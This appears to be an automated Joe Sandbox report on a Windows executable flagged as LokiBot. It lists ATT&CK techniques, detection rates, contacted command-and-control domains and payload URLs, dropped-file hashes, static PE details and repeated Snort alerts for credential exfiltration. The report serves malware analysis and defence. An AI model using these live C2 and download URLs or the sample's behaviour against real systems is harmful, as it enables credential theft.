          Valid Accounts | Windows Management Instrumentation | DLL Side-Loading 1 | Process Injection 312 | Masquerading 1 | OS Credential Dumping 2 | Security Software Discovery 311 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Virtualization/Sandbox Evasion 221 | Credentials in Registry 1 | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 312 | Security Account Manager | Virtualization/Sandbox Evasion 221 | SMB/Windows Admin Shares | Data from Local System 2 | Automated Exfiltration | Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | System Information Discovery 4 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 115 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          2GirCpksIO.exe | 32% | Virustotal |
          2GirCpksIO.exe | 20% | ReversingLabs |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          Source | Detection | Scanner | Label
          afrocompass.com | 4% | Virustotal |
          karinedocesesalgados.com.br | 8% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://schemas.microso | 0% | Avira URL Cloud | safe
          https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin | 0% | Avira URL Cloud | safe
          http://karinedocesesalgados.com.br/nedo/five/fre.php | 0% | Avira URL Cloud | safe
          https://afrocompass.com/k | 0% | Avira URL Cloud | safe
          https://karinedocesesalgados.com.br/nedo/five/fre.php | 0% | Avira URL Cloud | safe
          https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin0; | 0% | Avira URL Cloud | safe
          https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin_ | 0% | Avira URL Cloud | safe
          https://afrocompass.com/karinedocesesalgados_Hpi | 0% | Avira URL Cloud | safe
          https://afrocompass.com/c | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          afrocompass.com | 68.66.226.70 | true | true | | unknown
          karinedocesesalgados.com.br | 192.185.217.246 | true | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin | false | Avira URL Cloud: safe | unknown
          http://karinedocesesalgados.com.br/nedo/five/fre.php | true | Avira URL Cloud: safe | unknown
          https://afrocompass.com/karinedocesesalgados_Hpi | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://schemas.microso | UserOOBEBroker.exe, 00000004.00000002.10830879380.000001C6E8B00000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | unknown
          http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 0000000A.00000000.6718254573.000001CE61451000.00000004.00000001.sdmp | false | | high
          http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000000.6700942689.000001CE61413000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000002.10833511138.000001CE61A00000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmp | false | | high
          https://afrocompass.com/k | 2GirCpksIO.exe, 00000005.00000002.10831731401.000000000082E000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
          https://karinedocesesalgados.com.br/nedo/five/fre.php | 2GirCpksIO.exe, 00000005.00000002.10832583099.0000000000898000.00000004.00000020.sdmp, 2GirCpksIO.exe, 00000005.00000003.6933085805.0000000000898000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
          http://schemas.xmlsoap.org/wsdl/ | lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmp | false | | high
          https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin0; | 2GirCpksIO.exe, 00000005.00000002.10832026164.0000000000859000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.live.com | lsass.exe, 0000000A.00000002.10833511138.000001CE61A00000.00000004.00000001.sdmp | false | | high
          http://www.msn.com | lsass.exe, 0000000A.00000002.10833511138.000001CE61A00000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 0000000A.00000000.6718254573.000001CE61451000.00000004.00000001.sdmp | false | | high
          http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 0000000A.00000000.6718254573.000001CE61451000.00000004.00000001.sdmp | false | | high
          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmp | false | | high
          https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin_ | 2GirCpksIO.exe, 00000005.00000002.10831731401.000000000082E000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
          https://afrocompass.com/c | 2GirCpksIO.exe, 00000005.00000002.10831731401.000000000082E000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown

                                Contacted IPs

                                Public

                                IP | Domain | Country | ASN | ASN Name | Malicious
                                192.185.217.246 | karinedocesesalgados.com.br | United States | 46606 | UNIFIEDLAYER-AS-1US | true
                                68.66.226.70 | afrocompass.com | United States | 55293 | A2HOSTINGUS | true

                                General Information

                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:526365
                                Start date:22.11.2021
                                Start time:15:25:41
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 13m 0s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:2GirCpksIO.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                Run name:Suspected Instruction Hammering
                                Number of analysed new started processes analysed:11
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.rans.troj.spyw.evad.winEXE@4/4@2/2
                                EGA Information:
                                • Successful, ratio: 66.7%
                                HDC Information:Failed
                                HCA Information:Failed
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe
                                • HTTP Packets have been reduced
                                • TCP Packets have been reduced to 100
                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wdcpalt.microsoft.com, login.live.com, wdcp.microsoft.com, arc.msn.com, nexusrules.officeapps.live.com
                                • Execution Graph export aborted for target lsass.exe, PID 1016 because there are no executed function
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                Time | Type | Description
                                15:29:08 | API Interceptor | 488x Sleep call for process: 2GirCpksIO.exe modified

                                Joe Sandbox View / Context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Credentials\93CE54EBD72B5E2187F75E8118A14612_dec
                                Process:C:\Windows\System32\lsass.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3656
                                Entropy (8bit):7.047605315526176
                                Encrypted:false
                                SSDEEP:96:tO8ab0MEOHAROl5X1TJi1FngApY2gpZhprCRF8hVos+cYO40:s8oVgROl5lTJAFApnp/xJL
                                MD5:0C791F9EFA54F4FFE2203D14A2401528
                                SHA1:C5EC56621DEC7C6BB9711123DD2DFDB22A9EED89
                                SHA-256:BEB9BF78BD08BBF91F090233587CD6A76FFC819EDF91D3A3099264B26986C6AE
                                SHA-512:DD62210C98A52BB391174F56ED49283D11CBB7F2E12ED9D6F69EDED303E40FA2FC32670EEBA11A23D6E5FBEF702172B8B105C114D4413C273AD55C609D98B71E
                                Malicious:false
                                Reputation:low
                                C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.hdb
                                Process:C:\Users\user\Desktop\2GirCpksIO.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):2.0
                                Encrypted:false
                                SSDEEP:3:Nn:Nn
                                MD5:9C3784B43620F067283A5B473E4FA839
                                SHA1:6A0856C8F5E5F495CE1EB4AFBBB97B2D75D7A0DE
                                SHA-256:554F626F83D6FCEA54BD064C60534D5DA4BD36CCAFD9581D7BCE16EA5D7CCDDB
                                SHA-512:D81091737B27F9490FC24BA4DC35DABB8999B5F94960AA098FAF0D2D9F6413CB457244D843DCD3D7664EE6D5D81966DA8B1D951BCF5D82DAE8C3D30EC92539C4
                                Malicious:false
                                Reputation:low
                                Preview: ....
                                C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.lck
                                Process:C:\Users\user\Desktop\2GirCpksIO.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: 1
                                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb
                                Process:C:\Users\user\Desktop\2GirCpksIO.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):47
                                Entropy (8bit):1.1262763721961973
                                Encrypted:false
                                SSDEEP:3:/lSllIEXln:AWE1
                                MD5:D69FB7CE74DAC48982B69816C3772E4E
                                SHA1:B1C04CDB2567DC2B50D903B0E1D0D3211191E065
                                SHA-256:8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
                                SHA-512:7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: ........................................user.

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.550902828543532
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.15%
                                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:2GirCpksIO.exe
                                File size:114688
                                MD5:5cc619f7dd365ec061f1f385d25bea30
                                SHA1:5b28cb97973da18953fb284648f13257f0aba2f3
                                SHA256:7f5124088c09a925ad3a162b4e56391557dfc7d9950b9a55044036698d369d13
                                SHA512:bc3f1c85c20d22c7124ed93987f49d32cbe21639d7078ff0cb11dc5f439342f9609ba78c92b097affd610ee878372e8673a12829ba16ee70b73c1470f1124cd7
                                SSDEEP:1536:SIQo1sxasghSzS9Qu2cRs/UVCNmETDFdnvr3Syjh3sMU+Wi04Mthlxxx:X51sxXiQu2cRss8mSFROyjh3s6W2u
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L....5.a.....................@....................@................

                                File Icon

                                Icon Hash:20047c7c70f0e004

                                Static PE Info

                                General

                                Entrypoint:0x401398
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                DLL Characteristics:
                                Time Stamp:0x619B35E8 [Mon Nov 22 06:17:12 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:6161f2da031dac68f8cae17819217d19

                                Entrypoint Preview

                                Instruction
                                push 0040144Ch
                                call 00007FDA78CDA2F3h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                inc eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add bh, bh
                                mov dl, 93h
                                int1
                                or eax, 9B479C46h
                                mov ah, 10h
                                dec esi
                                lds ebx, esp
                                loope 00007FDA78CDA29Bh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add dword ptr [eax], eax
                                add byte ptr [eax], al
                                add byte ptr [ebx], al
                                add dword ptr [eax], eax
                                add byte ptr [eax], al
                                inc esi
                                dec ecx
                                dec ebp
                                push ebx
                                inc ebp
                                inc esp
                                inc ebp
                                push ebx
                                add byte ptr [eax], cl
                                inc ecx
                                add al, dh
                                pop es
                                inc ecx
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [esi], al
                                add byte ptr [eax], al
                                add byte ptr [esi+40h], cl
                                add byte ptr [edi], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], bh
                                inc eax
                                add byte ptr [edi], al
                                add byte ptr [eax], al
                                add ah, dl
                                and byte ptr [eax+00h], al
                                pop es
                                add byte ptr [eax], al
                                add byte ptr [eax+40h], bh
                                add byte ptr [ecx], al
                                add byte ptr [edx], al
                                add byte ptr [eax+1Ch], ah
                                inc eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add bh, bh

                                Data Directories

                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x18764 | 0x28 | .text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1b000 | 0x1ede | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x148 | .text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0

                                Sections

                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x1000 | 0x17cac | 0x18000 | False | 0.631123860677 | data | 6.86127779315 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .data | 0x19000 | 0x11dc | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .rsrc | 0x1b000 | 0x1ede | 0x2000 | False | 0.205200195312 | data | 4.84044222159 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                Name | RVA | Size | Type | Language | Country
                                45 | 0x1ca92 | 0x420 | ASCII text, with CRLF line terminators | English | United States
                                CUSTOM | 0x1c672 | 0x420 | ASCII text, with CRLF line terminators | English | United States
                                CUSTOM | 0x1c252 | 0x420 | ASCII text, with CRLF line terminators | English | United States
                                CUSTOM | 0x1be16 | 0x43c | ASCII text, with CRLF line terminators | English | United States
                                CUSTOM | 0x1ba94 | 0x382 | ASCII text, with CRLF line terminators | English | United States
                                RT_ICON | 0x1b964 | 0x130 | data
                                RT_ICON | 0x1b67c | 0x2e8 | data
                                RT_ICON | 0x1b554 | 0x128 | GLS_BINARY_LSB_FIRST
                                RT_STRING | 0x1ceb2 | 0x2c | data | English | United States
                                RT_GROUP_ICON | 0x1b524 | 0x30 | data
                                RT_VERSION | 0x1b2d0 | 0x254 | data

                                Imports

                                DLL | Import
                                MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaR8Str, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaLateMemCall, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                Version Infos

                                Description | Data
                                Translation | 0x0000 0x04b0
                                InternalName | SORNER
                                FileVersion | 1.00
                                CompanyName | Fireflies.ai
                                Comments | Fireflies.ai
                                ProductName | Fireflies.ai
                                ProductVersion | 1.00
                                OriginalFilename | SORNER.exe

                                Possible Origin

                                Language of compilation system | Country where language is spoken | Map
                                English | United States

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                11/22/21-15:29:00.949977TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14978880192.168.11.20192.185.217.246
                                11/22/21-15:29:00.949977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.11.20192.185.217.246
                                11/22/21-15:29:00.949977TCP2025381ET TROJAN LokiBot Checkin4978880192.168.11.20192.185.217.246
                                11/22/21-15:29:00.949977TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24978880192.168.11.20192.185.217.246
                                11/22/21-15:29:07.797027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.11.20192.185.217.246
                                11/22/21-15:29:07.797027TCP2025381ET TROJAN LokiBot Checkin4978980192.168.11.20192.185.217.246
                                11/22/21-15:29:08.696328TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.11.20192.185.217.246
                                11/22/21-15:29:08.696328TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.11.20192.185.217.246
                                11/22/21-15:29:08.696328TCP2025381ET TROJAN LokiBot Checkin4979080192.168.11.20192.185.217.246
                                11/22/21-15:29:08.696328TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.11.20192.185.217.246
                                11/22/21-15:29:09.708761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.11.20192.185.217.246
                                11/22/21-15:29:09.708761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.11.20192.185.217.246
                                11/22/21-15:29:09.708761TCP2025381ET TROJAN LokiBot Checkin4979180192.168.11.20192.185.217.246
                                11/22/21-15:29:09.708761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.11.20192.185.217.246
                                11/22/21-15:29:10.753878TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.11.20192.185.217.246
                                11/22/21-15:29:10.753878TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.11.20192.185.217.246
                                11/22/21-15:29:10.753878TCP2025381ET TROJAN LokiBot Checkin4979280192.168.11.20192.185.217.246
                                11/22/21-15:29:10.753878TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.11.20192.185.217.246
                                11/22/21-15:29:11.736717TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.11.20192.185.217.246
                                11/22/21-15:29:11.736717TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.11.20192.185.217.246
                                11/22/21-15:29:11.736717TCP2025381ET TROJAN LokiBot Checkin4979380192.168.11.20192.185.217.246
                                11/22/21-15:29:11.736717TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.11.20192.185.217.246
                                11/22/21-15:29:12.785936TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.11.20192.185.217.246
                                11/22/21-15:29:12.785936TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.11.20192.185.217.246
                                11/22/21-15:29:12.785936TCP2025381ET TROJAN LokiBot Checkin4979480192.168.11.20192.185.217.246
                                11/22/21-15:29:12.785936TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.11.20192.185.217.246
                                11/22/21-15:29:13.775518TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.11.20192.185.217.246
                                11/22/21-15:29:13.775518TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.11.20192.185.217.246
                                11/22/21-15:29:13.775518TCP2025381ET TROJAN LokiBot Checkin4979580192.168.11.20192.185.217.246
                                11/22/21-15:29:13.775518TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.11.20192.185.217.246
                                11/22/21-15:29:14.715714TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.11.20192.185.217.246
                                11/22/21-15:29:14.715714TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.11.20192.185.217.246
                                11/22/21-15:29:14.715714TCP2025381ET TROJAN LokiBot Checkin4979680192.168.11.20192.185.217.246
                                11/22/21-15:29:14.715714TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.11.20192.185.217.246
                                11/22/21-15:29:15.742524TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.11.20192.185.217.246
                                11/22/21-15:29:15.742524TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.11.20192.185.217.246
                                11/22/21-15:29:15.742524TCP2025381ET TROJAN LokiBot Checkin4979780192.168.11.20192.185.217.246
                                11/22/21-15:29:15.742524TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.11.20192.185.217.246
                                11/22/21-15:29:16.767344TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.11.20192.185.217.246
                                11/22/21-15:29:16.767344TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.11.20192.185.217.246
                                11/22/21-15:29:16.767344TCP2025381ET TROJAN LokiBot Checkin4979880192.168.11.20192.185.217.246
                                11/22/21-15:29:16.767344TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.11.20192.185.217.246
                                11/22/21-15:29:17.727561TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.11.20192.185.217.246
                                11/22/21-15:29:17.727561TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.11.20192.185.217.246
                                11/22/21-15:29:17.727561TCP2025381ET TROJAN LokiBot Checkin4979980192.168.11.20192.185.217.246
                                11/22/21-15:29:17.727561TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.11.20192.185.217.246
                                11/22/21-15:29:18.707511TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.11.20192.185.217.246
                                11/22/21-15:29:18.707511TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.11.20192.185.217.246
                                11/22/21-15:29:18.707511TCP2025381ET TROJAN LokiBot Checkin4980080192.168.11.20192.185.217.246
                                11/22/21-15:29:18.707511TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.11.20192.185.217.246
                                11/22/21-15:29:19.741161TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.11.20192.185.217.246
                                11/22/21-15:29:19.741161TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.11.20192.185.217.246
                                11/22/21-15:29:19.741161TCP2025381ET TROJAN LokiBot Checkin4980180192.168.11.20192.185.217.246
                                11/22/21-15:29:19.741161TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980180192.168.11.20192.185.217.246
                                11/22/21-15:29:20.815321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.11.20192.185.217.246
                                11/22/21-15:29:20.815321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.11.20192.185.217.246
                                11/22/21-15:29:20.815321TCP2025381ET TROJAN LokiBot Checkin4980280192.168.11.20192.185.217.246
                                11/22/21-15:29:20.815321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.11.20192.185.217.246
                                11/22/21-15:29:21.862086TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.11.20192.185.217.246
                                11/22/21-15:29:21.862086TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.11.20192.185.217.246
                                11/22/21-15:29:21.862086TCP2025381ET TROJAN LokiBot Checkin4980380192.168.11.20192.185.217.246
                                11/22/21-15:29:21.862086TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980380192.168.11.20192.185.217.246
                                11/22/21-15:29:22.752104TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.11.20192.185.217.246
                                11/22/21-15:29:22.752104TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.11.20192.185.217.246
                                11/22/21-15:29:22.752104TCP2025381ET TROJAN LokiBot Checkin4980480192.168.11.20192.185.217.246
                                11/22/21-15:29:22.752104TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.11.20192.185.217.246
                                11/22/21-15:29:23.755166TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.11.20192.185.217.246
                                11/22/21-15:29:23.755166TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.11.20192.185.217.246
                                11/22/21-15:29:23.755166TCP2025381ET TROJAN LokiBot Checkin4980580192.168.11.20192.185.217.246
                                11/22/21-15:29:23.755166TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.11.20192.185.217.246
                                11/22/21-15:29:24.727798TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.11.20192.185.217.246
                                11/22/21-15:29:24.727798TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.11.20192.185.217.246
